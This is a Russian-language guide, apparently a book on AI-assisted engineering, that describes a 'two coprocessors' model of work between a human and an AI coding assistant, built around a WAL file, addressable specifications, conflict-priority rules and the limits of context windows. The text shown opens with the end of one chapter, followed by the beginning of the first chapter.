Утренняя рутина начинается с WAL. Не с кода, не с почты. Прочитай. Совпадает ли с тем, что помнишь? Если помнишь, что вчера тест на timeout был flaky — а WAL говорит «all tests pass» — поправь, прежде чем запускать новую сессию.

Голова человека — persistent memory. WAL — volatile (перезаписывается каждую сессию). Когда они расходятся — побеждает голова, потому что голова старше и содержит контекст, который WAL не фиксирует: интуицию, ощущение «что-то не так», переговоры с пользователями, решения, принятые за кофе.

## Практическая структура файлов

Теория хороша, но давайте посмотрим на конкретную структуру проекта:

project/
├── specs/ # IPC-буфер (shared state)
│ ├── BOOT.md # BIOS — точка входа AI
│ ├── WAL.md # Continuation state
│ ├── WAL-PROTOCOL.md # Как работать с WAL (алгоритмический)
│ ├── SPEC-PROTOCOL.md # Как обновлять спеки (протокол конфликтов)
│ ├── common/
│ │ ├── main.md # Архитектура, стек, решения
│ │ ├── structure.md # Карта модулей
│ │ └── PROP-000.md # Фундаментальные решения
│ └── modules/
│ ├── oproto/ # Модуль OPROTO
│ │ ├── PROP-001.md # Базовый протокол
│ │ └── FEAT-001.md # Подключение к edge-серверу
│ ├── edge/ # Модуль edge-сервера
│ └── client/ # Модуль десктопного клиента
├── crates/ # Артефакты (generated code)
├── tests/ # Executable specs
├── tools/
│ └── spec-lint.sh # Верификация ссылочной целостности
├── .human/ # Буфер только для человека (AI-ignored)
│ └── shortcuts.md # Быстрые команды для копипасты
├── .claudeignore # Что AI не читает
└── CLAUDE.md # Инструкции для Claude Code

Обратите внимание на разделение: specs/ — shared state для обоих; crates/ и tests/ — артефакты AI, верифицируемые человеком; .human/ — private memory человека, невидимая для AI; CLAUDE.md — конфигурация процесса AI.

.human/ заслуживает отдельного комментария. Это директория для заметок, которые не должны попадать в контекст AI. Почему? Каждый файл, прочитанный AI — это токены. Файл shortcuts.md содержит команды для копипасты типа «ты дрифтуешь, перечитай спеку». Если AI прочитает это — он потратит токены на содержимое, не имеющее отношения к задаче. Хуже того — может среагировать: увидит «ты дрифтуешь» и начнёт рефлексировать.

Вместо логического запрета («не читай этот файл») мы используем физическую невидимость: .claudeignore содержит .human/, и Claude Code просто не видит эту директорию. Физическая невидимость надёжнее логического запрета, как firewall надёжнее таблички «вход воспрещён».

## Как два писателя не ломают друг друга

Всё, что мы обсудили — адресуемость, атомарность, протокол конфликтов, видимость, WAL — работает вместе как одна система. Проследим полный цикл.

Утро. Человек.

Имеется человек-Олег. Олег открывает WAL. Читает: «PROP-001§5.1-5.2: COMPLETE, §5.3-5.4: TODO». Помнит, что вчера вечером решил поменять таймаут с 300s на 600s (пользователи с VPN через три страны не укладываются). Открывает спеку, находит {#verification.timeout}, меняет значение. Добавляет в changelog: «[2026-02-17] §5.3: timeout 300s → 600s, reason: VPN users need more time». Коммитит.

Сессия с Claude Code.

Олег пишет:

Реализуй degraded mode по spec://oproto/PROP-001#verification.degraded.
Контекст: с последней сессии я изменил таймаут в §5.3 — учти.
Не трогай match_by_hash(), он стабилен.

Claude Code читает BOOT.md → WAL → PROP-001. Видит обновлённую спеку (потому что Олег закоммитил утром — свежие файлы, не кэш). Реализует degraded mode. Использует 600s из спеки. Не трогает match_by_hash (инструкция от человека + WAL). Пишет три теста, каждый ссылается на спеку. Обнаруживает, что degraded mode требует reconnection logic, которая в Known Issues. Добавляет REVIEW. Обновляет WAL. Формирует отчёт:

## Changes
### Specs: no changes needed, impl matches spec
### Code: crates/oproto-core/src/verify.rs — degraded_mode_handler()
### Tests: 3 new (degraded send, degraded timeout, degraded recovery)
### Risks: REVIEW in PROP-001§5.2 — degraded recovery depends on reconnection

Вечер. Человек.

Олег смотрит diff. Один файл, три теста, WAL обновлён. Видит REVIEW — reconnection нужно решить, но не сейчас. Добавляет в WAL: «Decisions Pending: reconnection strategy». Коммитит.

30 минут. Одна задача. Ноль конфликтов.

## Что может пойти не так

Было бы нечестно описывать только happy path.

Сбой 1: AI обновил спеку без уведомления. Diff показывает: AI заменил «600 seconds» на «300 seconds with exponential backoff». Исправление: откати спеку (git checkout), оставь код. В начале следующей сессии: «Ты изменил спеку без REVIEW. Откатываю. Если считаешь, что exponential backoff лучше — добавь REVIEW, обсудим». И добавь в CLAUDE.md: «Never modify spec values without REVIEW marker».

Сбой 2: WAL устарел. Вчерашняя сессия завершилась аварийно (переполнение контекста), AI не успел обновить WAL. Исправление: ты — persistent memory. Посмотри git log и git diff за вчера, восстанови картину, обнови WAL вручную. Это одна из причин, почему человек незаменим — он является живым бэкапом для WAL.

Сбой 3: Спека противоречит сама себе. После двадцати итераций §2 говорит одно, §5 — другое. Исправление: перечитай спеку целиком. Найди противоречие. Реши, какая версия правильна. Это еженедельная рутина: полное перечитывание ключевых спек. Скучно, но необходимо — ты выполняешь роль garbage collector для shared state.

## Дальнейшее чтение

Для тех, кто хочет копать глубже в идеи этой главы:

Про boundary objects и shared artifacts:
Susan Leigh Star & James Griesemer, «Institutional Ecology, 'Translations' and Boundary Objects» (Social Studies of Science, 1989) — каноническая работа об объектах, обслуживающих коммуникацию между разными сообществами. Наши спеки — пример boundary object, как по учебнику.

- PDF (свободный доступ): https://lchc.ucsd.edu/mca/Mail/xmcamail.2012_09.dir/pdfuaCxVBhVe5.pdf

- SAGE/JSTOR: https://journals.sagepub.com/doi/10.1177/030631289019003001

Про spec-driven development как формирующуюся практику:
Birgitta Böckeler, «Understanding Spec-Driven-Development: Kiro, spec-kit, and Tessl» (martinfowler.com, октябрь 2025) — хороший обзор SDD-инструментов и таксономии (spec-first / spec-anchored / spec-as-source).

- https://martinfowler.com/articles/exploring-gen-ai/sdd-3-tools.html

Про attention degradation в длинных контекстах:
Nelson F. Liu et al., «Lost in the Middle: How Language Models Use Long Contexts» (TACL, 2024) — эмпирическое доказательство U-образной кривой внимания: начало и конец контекста «видны» модели, середина — нет.

- ACL Anthology: https://aclanthology.org/2024.tacl-1.9/

- arXiv: https://arxiv.org/abs/2307.03172

- MIT Press: https://direct.mit.edu/tacl/article/doi/10.1162/tacl_a_00638/119630

Про WAL-паттерн и decision logs:
Addy Osmani, «Automated Decision Logs in AI-Assisted Coding» (addyosmani.com, ноябрь 2024) — ближайший аналог нашего WAL под другим именем: фиксация reasoning за каждым изменением в отдельном файле.

- https://addyosmani.com/blog/automated-decision-logs/

Про distributed cognition:
Edwin Hutchins, Cognition in the Wild (MIT Press, 1995) — фундаментальная работа о том, как мышление распределяется между людьми и артефактами. Навигационная команда корабля — это когнитивная система, а не набор отдельных умов. Прямая аналогия с системой человек—AI.

- MIT Press: https://mitpress.mit.edu/9780262581462/cognition-in-the-wild/

- Страница автора: https://pages.ucsd.edu/~ehutchins/citw.html

Про литературное программирование как предшественника spec-first:
На самом деле не «литературное», а «грамотное» — но безграмотный перевод прижился сильнее. Donald Knuth, «Literate Programming» (The Computer Journal, 1984) — «давайте сконцентрируемся на объяснении людям, что мы хотим от компьютера». Программа как литературное произведение, где нарратив важнее кода. Прямой предок философии «спека — исходник, код — бинарник».

- PDF (свободный доступ): >https://www.cs.tufts.edu/~nr/cs257/archive/literate-programming/01-knuth-lp.pdf

- Oxford Academic: https://academic.oup.com/comjnl/article/27/2/97/343244

- Страница Кнута в Stanford: https://www-cs-faculty.stanford.edu/~knuth/lp.html

## Где реализация WAL?! Где код?!
Как мне это внедрять?!

Самый простой и лучший способ — взять достаточно умный AI (например, Claude Opus) и скопипасить туда весь текст этой статьи. И попросить человечьим голосом: «пожалуйста, прочитай статью и спроектируй механизм работы WAL, который полностью соответствует описанным в статье идеям. Интегрируй автоматическое использование этого протокола в файлы спецификаций: BOOT.md, AGENTS.md, INSTRUCTIONS.md, CLAUDE.md, либо любые другие, которые ты считаешь нужным. Внимательно посмотри на специфику проекта и адаптируй WAL для нашего случая.».

Можно сделать более глобально - «пожалуйста, прочитай статью и адаптируй мой проект так, чтобы выполнялись все процедуры и идеи, которые написаны в этой статье. Если это требует какого-то большого рефакторинга, то ultrathink и напиши мне план, как мы собираемся это сделать». Будьте уверены, AI знает, как реализовать все принципы из этой статьи даже лучше, чем это знает автор.

Здесь можно было бы дать ссылку на какой-то репозиторий с шаблонами. Возможно, я когда-нибудь так и сделаю. Но правда в том, что действительно хороший AI (хотя бы уровня Claude Opus) намного умнее наших навечно захардкоженных шаблонных md-файлов, которые сейчас все пытаются упихать в чудовищного размера репозитории.

## Что дальше

Мы описали как два процесса обмениваются данными. Но остался вопрос: что именно стоит записывать, а что — нет? Какой формат памяти оптимален для каждого типа информации? Как устроена иерархия «голова → WAL → спеки → код» и что происходит, когда она нарушается?

Об этом — в следующей главе: «Архитектура памяти».


---
## URL: https://oleg.guru/redbook/ru/two-process-model
## Title: Два процесса, одна задача — Красная книга AI-инженера
---

Два процесса, одна задача — Красная книга AI-инженера

- 
- 
- 
- 

✵ oleg.guru
Оглавление
Глава 1
Глава 2

Красная книга AI-инженера

Подробности об использовании документа — в разделе Safe Harbor.

# Глава первая.
Два процесса, одна задача

Почему отношения «начальник → подчинённый» и «человек → инструмент» не работают. Модель сопроцессоров. Как устроено разделение когнитивной нагрузки. Что может только человек, что может только AI, и где пересечение.

## Неправильные метафоры

Когда человек впервые садится работать с языковой моделью над реальным проектом (не над игрушечным «Hello World на Rust» и «TODO-list на React»), а над чем-то, что должно работать в продакшене, — он неизбежно начинает с одной из двух ментальных моделей.

Модель «начальник — подчинённый». Человек формулирует задачу. AI выполняет. Человек проверяет. AI исправляет. Это привычная схема — так устроена большая часть рабочих отношений в индустрии разработки. Начальник знает, что нужно сделать, а подчинённый знает, как это обычно делается. Ответственность это привилегия и проклятье начальника, бездумное исполнение остается на линейных сотрудниках.

Проблема в том, что AI — плохой подчинённый. Он не запоминает контекст между сессиями. Он не переспрашивает, когда задача неясна — вместо этого угадывает (часто, угадывает неправильно). Он не говорит «я не понял», а сразу генерирует уверенно выглядящий отборный ИИ-слоп, который может быть полностью неверным. Он не учится на ваших прошлых замечаниях — каждая новая сессия начинается с чистого листа. По крайней мере, такова механика нейросетей без использования дополнительного инструментария.

Но главная проблема не в этих ограничениях. Главная проблема — в распределении когнитивной нагрузки. В модели «начальник — подчинённый» вся интеллектуальная работа лежит на начальнике: планирование, декомпозиция задач, верификация результатов, поддержание общей картины. AI в этой модели — просто чуть более быстрые руки, чем у самого начальника.

Но если вам нужны только быстрые руки, зачем платить за самую мощную языковую модель в мире?

Если вы хоть раз работали начальником, вам должна быть знакома боль, когда исполнители постоянно подходят и спрашивают у тебя «а как это делать, я же не умею!». Время тратится не на настоящую работу (стратегию, вижен, политику, и в конечном счёте — getting things done), а на «руко-водство», т.е. натурально — вождение чужими руками. Если в это слишком сильно залипнуть, то вся настоящая работа будет полностью провалена, и проект пойдет на дно. Наверное, все это видели много раз. Повторить всё то же самое, но только с языковой моделью — было бы вдвойне тупо.

Модель «человек — инструмент». Человек использует AI как продвинутый автокомплит. Пишет начало функции, AI дописывает. Описывает компонент одним предложением, AI генерирует код. Это то, что инфоцыгане называют «AI-ассистент» — помощник, который ускоряет рутину.

Почему инфоцыгане? Да кто бы еще мог внятно объяснить, как эта модель может помочь с чем-то серьезным. Для маркетолога важна красота аналогии, яркость метафоры. Тут метафора ясная, AI-ассистент - это такой виртуальный секретарь, который делает тучу работы, а в промежутках приносит горячий кофе и томно заглядывает в глаза. Теперь вы как разработчик, представьте — вы смогли бы так писать код, общаясь с кодом через секретаря? Постоянно кричать «Аллочка, у нас отмена»?

Эта модель работает для мелких задач. Но для проекта длиной в месяцы она разрушительна. Потому что инструмент не имеет собственного «понимания» проекта. Он не видит общую картину. Он оптимизирует локально — текущий файл, текущую функцию — и может при этом разрушать глобальную согласованность системы. Каждое использование «инструмента» — это отдельный акт, не связанный с предыдущими.

В обеих моделях есть общая ошибка: человек берёт на себя 100% когнитивной нагрузки. AI выполняет механическую работу — набирает текст, генерирует шаблонный код, форматирует. Но думает только человек. А потом человек выгорит в угли, конечно же. К сожалению, человек не железный и не предназначен для 100% загрузки мозга совершенно новыми не-рутинными задачами. 

В этих моделях, ИИ — это такой компилятор на стероидах, не очень точный и не очень качественный. Это лишает систему её главного преимущества — возможности распределить мышление между двумя принципиально разными типами интеллекта.

## Что такое сопроцессор

Есть третья модель, и она работает (по крайней мере у меня). Но она требует ментального переключения, которое многим даётся тяжело — особенно опытным разработчикам.

Представьте себе систему из двух процессоров, работающих над одной задачей. Не один главный и один вспомогательный — два равноправных процессора с разной архитектурой. Как CPU и GPU в современном компьютере: CPU хорош в последовательных вычислениях со сложными зависимостями, GPU — в массивном параллелизме простых операций. Они не конкурируют за звание самого главного и «лучшего». Они разные, и сила системы — в их комбинации.

Человек и AI — это два процесса с радикально разной архитектурой:

Процесс «Человек» оптимизирован для:

- Persistent memory — помнит всё между сессиями, неделями, годами;

- Семантическое понимание — видит намерение за словами,
чувствует «дух» решения, а не только его букву;

- Интуиция — ощущает «что-то не так» до того, как может
это формализовать;

- Медленная, но глубокая верификация — может проследить
цепочку зависимостей через весь проект;

- Принятие решений в условиях неопределённости;

- Вкус — эстетические, этические, UX-решения.

Процесс «Человек» плохо справляется с:

- Высокой пропускной способностью — читает и пишет медленно;

- Механической согласованностью — пропускает опечатки,
забывает обновить связанные файлы;

- Удержанием большого количества деталей одновременно (7±2);

- Рутинными повторяющимися операциями;

- Работой под усталостью и стрессом;

- Удержанием фокуса в виртуальном мире — его постоянно отвлекает мир реальный.

Процесс «AI» оптимизирован для:

- Высокой пропускной способности — генерирует тысячи строк
кода за минуты;

- Механической согласованности в рамках одной сессии;

- Широкой, хотя и неглубокой эрудиции — знает синтаксис
десятков языков, API сотен библиотек;

- Рутинных операций — рефакторинг, форматирование, шаблонный код;

- Работы с формальными структурами — парсинг, трансформация,
генерация по шаблону;

- Абсолютной неутомимости (в пределах сессии и квадратичного бюджета токенов).

Процесс «AI» плохо справляется с:

- Persistent memory — забывает всё между сессиями;

- Семантическим пониманием — следует букве, не духу;

- Поддержанием когерентности на длинных дистанциях;

- Принятием решений, требующих контекста за пределами окна

- Обнаружением собственных ошибок;

- Волей — не может сам начать работу, сам поставить задачу, а когда всё-таки делает это с помощью специального тулинга — эпически проваливается на пересечении с реальным миром.

Ключевое наблюдение: эти наборы свойств комплементарны. Слабости одного процесса — это силы другого. Человек медленный, но всё помнит и держит когерентность воспоминаний между итерациями. AI быстрый, но всё забывает. Человек видит общую картину, но не может удержать все детали. AI удерживает детали, но не видит картину целиком.

Конечно же, тут надо не вдаваться в абсолютную идеализацию памяти человека. Я с трудом помню, что было два месяца назад, а всё что было далее двух лет - это воспоминания как будто бы другого человека. Но в случае определенной ментальной дисциплины и дистанций в несколько месяцев, когнитивное ядро человека всё ещё работает бесконечно лучше нейросети.

Также не стоит забывать, что реальные системы редко разрабатываются одним человеком с одним ИИ. Обычно, это коллектив разработчиков с десятками разных AI. Метафора "один к одному" здесь используется для упрощения и будет усложняться по ходу повествования.

Это описание реальной архитектуры, с которой вы работаете каждый день, даже если привыкли её игнорировать. И как любая архитектура, она имеет конкретные следствия для того, как нужно проектировать взаимодействие.

## Как выглядит продуктивная сессия

Рассмотрим конкретный пример. Я выберу из своей практики, но вы можете подобрать что-то свое. Представьте, что вы строите сетевой протокол для новой версии Telegram-клиента. У вас есть спецификация, описывающая формат сообщений. Вам нужно реализовать верификацию — проверку, что сообщение, которое пришло от клиента через новую версию протокола совпадает с тем, что было отправлено в Telegram через предыдущую его версию.

(Дальше будет какое-то количество понятий, с которыми вы, вероятно, еще не знакомы. Не потому что вы чего-то не знаете, а потому что я не описал их подробно. Более детально об элементах стека разработки мы поговорим в следующих главах).

Продуктивная сессия выглядит так:

Утро. Вы открываете WAL (Write-Ahead Log — файл, описывающий текущее состояние проекта). Читаете: «PROP-003: верификация. Реализован матчинг по хэшу. Не реализовано: таймауты для неверифицированных сообщений.» Вы думаете: таймауты — это следующий шаг. Открываете спецификацию, перечитываете секцию про таймауты. Решаете: 600 секунд, после чего сообщение получает статус TIMEOUT. Обновляете спеку.

Сессия с AI. Вы пишете: «Реализуй логику таймаутов по spec://oproto/PROP-003#verification.timeout. С прошлой сессии я изменил таймаут с 300s на 600s в спеке — учти. Не трогай матчер, только таймауты.»

AI читает boot-файл проекта, WAL, указанную спецификацию. Генерирует код: фоновый таск, который каждые 60 секунд проверяет неверифицированные сообщения старше 600 секунд и помечает их как TIMEOUT. Пишет три теста. Запускает — два проходят, один падает (ошибка в обработке edge case, когда сообщение верифицируется в момент проверки таймаута). AI исправляет, прогоняет тесты снова — все зелёные. Обновляет WAL: «PROP-003: таймауты реализованы, все тесты проходят.»

Верификация. Вы смотрите diff. Видите: новый файл timeout.rs, изменения в двух существующих файлах, три новых теста, обновлённый WAL. Пробегаете глазами тесты — покрывают ли они то, что описано в спеке? Да. Пробегаете diff в спеках — AI не менял спеку (правильно, вы сами её обновили утром). Коммитите.

30 минут. Одна конкретная задача. Результат: работающий код, соответствующий спецификации, с тестами.

Непродуктивная сессия выглядит так:

Вы пишете: «Допиши верификацию сообщений.» AI не знает, что конкретно «допиши». Начинает с чтения всего кода (тратит токены, вам приходится пополнять кошелёк на очередные 200 баксов). Обнаруживает, что матчер уже написан. Решает, что нужны таймауты (угадал). Но не знает, какой таймаут — в спеке написано 600s (вы обновили утром), но AI читал спеку в кэше из прошлой сессии, где было 300s. Генерирует код с 300s (не угадал!). Попутно решает «улучшить» матчер — добавляет нормализацию Unicode, которая не описана в спеке и ломает существующие тесты.

Вы видите diff: изменения в пяти файлах вместо двух, сломанные тесты, таймаут не тот. Тратите время на разбор: что из этого правильно, что нет. Просите исправить. AI исправляет, но в процессе снова трогает матчер. Ещё итерация. Ещё одна.

Два часа. Неопределённая задача. Результат: код, который может быть правильным, а может быть нет, и вам нужно внимательно вычитать каждую строку, чтобы это понять.

Разница между этими двумя сессиями — не в качестве AI. Это один и тот же AI — та же модель, тот же тулинг. Разница — в том, как человек выполнил свою часть работы. В продуктивной сессии человек:

- Прочитал WAL (поддержание контекста)

- Принял решение о таймауте (архитектурное решение)

- Обновил спеку (фиксация решения)

- Дал точную задачу с адресом в спеке (коммуникация)

- Проверил diff (верификация)

В непродуктивной сессии человек сделал одно действие: «допиши». Вся остальная работа — угадывание, восстановление контекста, принятие решений — легла на AI. И AI с ней не справился, потому что это не его сильная сторона.

## Разделение когнитивной нагрузки

Из модели сопроцессоров следует конкретная таблица ответственности. В ней минимум абстракций, она применима к каждому рабочему дню.

Только человек (AI может, но плохо):

- Думать о проекте на уровне смыслов и связи с Реальностью

- Принимать архитектурные решения на уровне смыслов

- Определять приоритеты задач

- Чувствовать, что «система ведёт себя не так»

- Помнить контекст между сессиями

- Поддерживать глобальную когерентность

- Решать, когда спецификация устарела

- Общаться с пользователями и понимать их потребности

- Принимать этические решения

Только AI (человек может, но неэффективно):

- Принимать архитектурные решения на уровне мелких деталей

- Генерировать большие объёмы согласованного кода за минуты

- Помнить точный синтаксис тысяч API

- Выполнять механические рефакторинги (переименование,
изменение сигнатур через всю кодовую базу) там, где IDE ломается

- Генерировать шаблонный код (тесты, boilerplate, шаблоны, конфиги)

- Проверять формальные свойства (линтинг, типизация, форматирование)

- Держать в «голове» все детали файла одновременно
(в пределах контекстного окна)

- Делать это неточно, вероятностно, с учётом всех мелких несостыковок инструментов, без необходимости бесконечно заниматься поддержкой интеграций.

Оба, но по-разному:

- Написание спецификаций. Человек формулирует идею и принимает
решение. AI структурирует, формализует, находит пробелы. Человек утверждает финальную версию.

- Код-ревью. AI проверяет формальные свойства (компилируется или нет проходят ли тесты, доволен ли линтер). Человек проверяет семантику
(код должен делать что нужно человеку, а не что формально написано в коде или спеках).

- Отладка. AI собирает информацию (логи, стектрейсы, контекст, в реальном времени общается по десяткам debug-протоколов одновременно).
Человек формулирует гипотезу. AI проверяет её конкретными тестами.

- Обновление документации. AI генерирует обновление по диффу
кода. Человек проверяет, что обновление отражает реальность, а не механическую трансляцию изменений.

Важное наблюдение: граница между зонами подвижна. Она зависит от состояния модели (насколько далеко мы продвинулись в возможностях AI), от конкретного проекта (критичность и сложность предметной области), и даже от времени дня (свежий человек утром берёт на себя больше, чем уставший вечером - ровно как и нейросеть в 12 часов ночи может лечь под нагрузкой на Amazon us-west-1).

Но одно остаётся неизменным: человек владеет когерентностью, иначе говоря — согласованностью между итерациями разработки и областями знаний. Это самая важная роль в системе, и мы посвятим ей отдельную главу.

## Shared memory: как процессы общаются между собой

Два процессора бесполезны, если они не могут обмениваться данными. В операционных системах процессы общаются через IPC (Inter-Process Communication): pipes, sockets, shared memory, файлы. На уровне железа процессоры общаются через общую шину, shared memory с протоколами когерентности кэшей (MESI/MOESI) и прерывания — один процессор записывает в память, другой видит изменение и реагирует. У каждого механизма свои свойства: скорость, надёжность, возможность одновременного доступа.

В системе «человек — AI» роль IPC играют файлы проекта и состояние инструментов (например, интерактивное состояние браузера в момент AI-отладки). Но не все файлы одинаково важны. Можно выделить три уровня:

Уровень 1: Управляющие файлы (человек → AI)

- Boot-файл (BOOT.md, AGENTS.md, CLAUDE.md) — инструкции, как читать
всё остальное. Аналог конфигурации BIOS.

- WAL (Write-Ahead Log) — текущее состояние проекта. Аналог
журнала файловой системы или основного леджера в крипте.

- Спецификации (PROP, FEAT) — описание того, что система
должна делать. Аналог shared memory, в которую пишут оба процесса, но с приоритетом человека.

Уровень 2: Артефакты (AI → человек, верифицируемые)

- Код — генерируется AI, верифицируется человеком через diff или суммаризацию diff (если сам diff настолько велик, что неспособен поместиться в быструю память человека).

- Тесты — генерируются AI по спекам, верифицируются прохождением.

- Обновления спек — AI может предлагать изменения, человек
утверждает.

Уровень 3: Сигналы (в обе стороны)

- REVIEW-маркеры в коде — AI помечает места, где принял
неочевидное решение.

- Git diff — сигнал от AI человеку: «вот что изменилось».

- Changelog в спеках — сигнал об эволюции решений.

- Сломанные тесты — сигнал о расхождении кода и спеки.

У этого IPC есть специфические требования, которых нет у обычной документации:

Адресуемость. Каждый пункт в каждом файле должен быть точно указуем. Когда AI дрифтует — а он будет дрифтовать, это неизбежно — человек должен за пять секунд найти и показать, что именно нарушено. Не «ты неправильно сделал верификацию», а «ты нарушаешь spec://oproto/PROP-003#verification.timeout — таймаут должен быть 600s, а у тебя 300s».

Для этого нужна адресная схема. Мы в Anarchic используем формат:

spec://<модуль>/<документ>#<секция>[.<подсекция>]

URI — это стандарт, который AI хорошо понимает из обучающих данных (ссылки в интернете, RFC, документация). Формат #секция — это стандартные якоря в Markdown. AI может найти файл по пути, секцию по якорю, и процитировать нужный пункт. Минимум токенов, максимум точности.

Атомарность обновлений. Когда AI обновляет спеку или код, изменение должно быть одним логическим шагом, видимым в diff. Если в одном коммите смешаны три несвязанных изменения — человек не сможет верифицировать эффективно. Каждый коммит — это одна мысль.

Практическое правило: один коммит = одно изменение в одной спеке + связанные изменения в коде и тестах. Не больше.

Программисты-люди очень не любят делать отдельные коммиты. Потому что это сложно. Я думаю, всем понятно, насколько чудовищная когнитивная нагрузка ложится на программиста, который прототипировал фичу в течение недели, а теперь ее нужно разбить на 40 разных коммитов с подробным описанием. У нейросетей нет таких проблем, они будут счастливы написать целую поэму в commit message и залить это с произвольной гранулярностью.

Протокол конфликтов. Два писателя могут и будут писать в исходнике противоречивые вещи. Это нормальная часть совместной работы, рассматривать это как ошибку - вредно и контрпродуктивно. Нужны явные правила разрешения конфликтов:

Иерархия приоритетов:

- Человек побеждает спеку (человек может изменить спеку)

- Спека побеждает код (код должен соответствовать спеке)

- Тесты — это спека в исполняемой форме (если тест
противоречит спеке, это баг в тесте или в спеке, но не в обоих)

Камень, ножницы, бумага — камень, ящерица, Спок.

Если AI считает, что спека ошибочна — он не молча переписывает спеку. Он реализует то, что написано в спеке, добавляет REVIEW-маркер («я думаю, здесь лучше сделать X, потому что Y»), и сообщает человеку в отчёте. Человек решает проблему в следующем цикле.

На первый взгляд это выглядит как бюрократия. Но заметьте, основная проблема бюрократии в Реальности — то, что это долго, дорого, и в конечном итоге не приводит ни к чему хорошему. Описанные выше процессы — быстрые, дешевые (явно дешевле в токенах, чем работа в режиме ризонинга с никак не описанным кодом), и приводят к фантастическому росту качества результата.

Технологически, это memory fence из concurrent programming. Без явных правил приоритета два процесса неизбежно создадут race condition, и результат будет непредсказуем. Мы решаем это классическими методами, только в некой лайтовой адаптации на нейросетевую специфику.

## Архитектура памяти

Это, возможно, самый важный и сложный раздел во всей AI разработке (по состоянию на начало 2026 года). По сложности это похоже на concurrent programming в классическом программировании. Тем не менее, чтобы освоить самую базу, становиться Лёшей Шипилёвым совершенно не обязательно.

Всё, что мы будем обсуждать дальше — когерентность, дрифт, WAL, стратегия сессий — вытекает из одного фундаментального факта:

AI не имеет памяти между сессиями. Совсем.

Каждая новая сессия Claude Code или GigaCode Agents — это новый процесс, который ничего не знает о предыдущих. Он не помнит, какие решения были приняты. Не помнит, какие подходы не сработали. Не помнит, какой стиль кода вы предпочитаете. Не помнит, что вы вчера потратили два часа на исправление бага в reconnection logic, и что этот код теперь хрупкий и его нельзя трогать.

WAL и спецификации — это единственная память, которую AI имеет о прошлом.

И то, если вы удосужились этот самый WAL организовать вручную. По-умолчанию его нет. Производители AI инструментов сейчас пытаются внедрять свои инструменты для сохранения памяти, всевозможные MEMORY.md. Пользоваться ими можно, но вот какой нюанс: никакие из этих инструментов не знают, что именно вы делаете в вашем коде, как именно устроен производственный процесс. Два разных подхода к программированию требуют два совершенно разных подхода к программированию AI-лога. Это чем-то похоже на разницу между обычными банковскими транзакциями и Биткоином - и у тебя деньги и у меня деньги, в обеих местах база и лог, но есть нюанс.

Давайте это прочувствуем на аналогии. Представьте, что каждое утро к вам в офис приходит новый разработчик. Блестящий, талантливый, знающий все языки и фреймворки. Но каждый вечер он уходит и никогда не возвращается. Завтра придёт другой — такой же талантливый, но без единого воспоминания о вашем проекте. Всё, что он знает — это то, что написано в документации и коде. Если в документации написано «используем SHA-256», а вы вчера решили перейти на blake3, но не обновили документацию — новый разработчик будет использовать SHA-256.

Это точное описание того, что происходит с AI между сессиями. И из этого следует несколько неочевидных выводов.

Вывод 1: Записывай решения, а не факты.

Фраза «используем blake3» — это факт, его видно из кода. Фраза «используем blake3, потому что SHA-256 тянет за собой OpenSSL dependency, а мы хотим минимальный binary size для edge-серверов на слабом железе» — это решение. Второе в десять раз ценнее.

Почему? Потому что факт можно восстановить из кода. А причину решения — нельзя. И когда через месяц вы (или AI) будете думать «а может, перейти на SHA-256?», записанная причина мгновенно ответит: нет, потому что OpenSSL. Без записанной причины вы потратите час на повторный анализ.

Это не уникально для AI-разработки. Это хорошая практика в любом проекте. Но в AI-разработке это критически важно, потому что AI не может «вспомнить» — он может только прочитать.

Также, из этого следует важный и болезненный факт: копировать чужие промты из интернета (например, готовый промт для WAL-лога) — намного менее эффективно, чем поставить задачу для ИИ переизобрести этот лог заново. Нужно копировать не промт-реализацию, а промт-задачу — предварительно переработав эту задачу для каждого конкретного проекта.

Вывод 2: Всё, что не записано — не существует.

В обычной разработке значительная часть знаний о проекте живёт в головах разработчиков. «Почему мы используем эту библиотеку?» — «Потому что Вася три месяца назад попробовал пять альтернатив и эта единственная работала с нашей версией glibc.» Это tribal knowledge, и оно работает, пока Вася в команде. Это common sense — но до тех пор, пока команда не сменилась, и никакого общего сенса с новой командой больше нет.

В системе «человек — AI» tribal knowledge работает ещё хуже. AI не может подойти к Васе и спросить подробности. Если знание не записано в файле, который AI может прочитать — этого знания не существует для AI. И AI примет решение без этого знания. Возможно, неправильное.

Практическое следствие: каждый раз, когда вы принимаете решение — запишите его. Не потому что вы забудете (хотя забудете — через два месяца интенсивной работы). А потому что AI никогда и не знал ничего, и узнает только из записи.

Вывод 3: Контекстное окно — это рабочая память AI, и она конечна.

Claude имеет контекстное окно порядка 200 000 токенов. Это много — это примерно 500 страниц текста. Но это всё: и спецификации, и код, и ваши промпты, и ответы AI. К середине длинной сессии значительная часть окна занята историей разговора, и AI начинает «забывать» то, что было прочитано в начале.

Причём 200 000 — это формальный размер буфера, а не реальная рабочая ёмкость. Часть окна съедают системные инструкции и нарастающая история диалога. Из оставшегося модель эффективно фокусируется на 30–50 тысячах токенов — начало и конец контекста, «горячие зоны». Середина — зона пониженного внимания (эффект «lost in the middle», эмпирически подтверждённый Стэнфордом в 2023 году). Пункт спецификации, загруженный 100K токенов назад, формально «виден», но его вес в матрице внимания статистически ничтожен рядом с последним промптом.

Это не метафора «забывания». Технически, весь текст по-прежнему находится в окне. Можно даже проскроллить его мышкой в окне чата! Но механизм внимания (attention) распределяется на большее количество токенов, и отдельные пункты спецификации получают меньше веса. Результат: AI начинает «импровизировать» вместо того, чтобы следовать спеке.

Это фундаментальное свойство архитектуры трансформеров, и оно не будет исправлено в ближайшем будущем. Это нужно принять как данность и выстроить процесс вокруг этого ограничения.

Практическое следствие: короткие сессии лучше длинных. Лучше пять сессий по 30 минут, чем одна на 2.5 часа. Каждая новая сессия — это чистое контекстное окно и свежее внимание. (Мы подробно разберём это в главе о дрифте.)

## Архитектура памяти системы

Если свести всё вышесказанное в одну схему:

Стратегия, которая следует из этой архитектуры:

Используй файлы как внешнюю память для обоих процессов. Всё, что важно, должно быть записано. Не потому что AI забудет (хотя забудет). А потому что и ты забудешь. Через два месяца интенсивной работы ты не вспомнишь, почему выбрал конкретную библиотеку для хэширования. Но если в PROP-003 написано «blake3, потому что быстрее в 3 раза и не требует OpenSSL» — вспомнишь за секунду.

Минимизируй нагрузку на рабочую память обоих. Для AI это значит короткие сессии, точные задачи, ссылки на конкретные секции спек вместо «прочитай всё». Для человека — это значит спеки вместо кода, diff вместо полного чтения, чеклисты вместо «держи в голове».

Файлы — единственное пересечение долгосрочной памяти. Всё, что живёт только в голове человека — невидимо для AI. Всё, что AI «понял» в текущей сессии — исчезнет с закрытием сессии. Только файлы переживают обоих.

## Что значит «работать вместе»

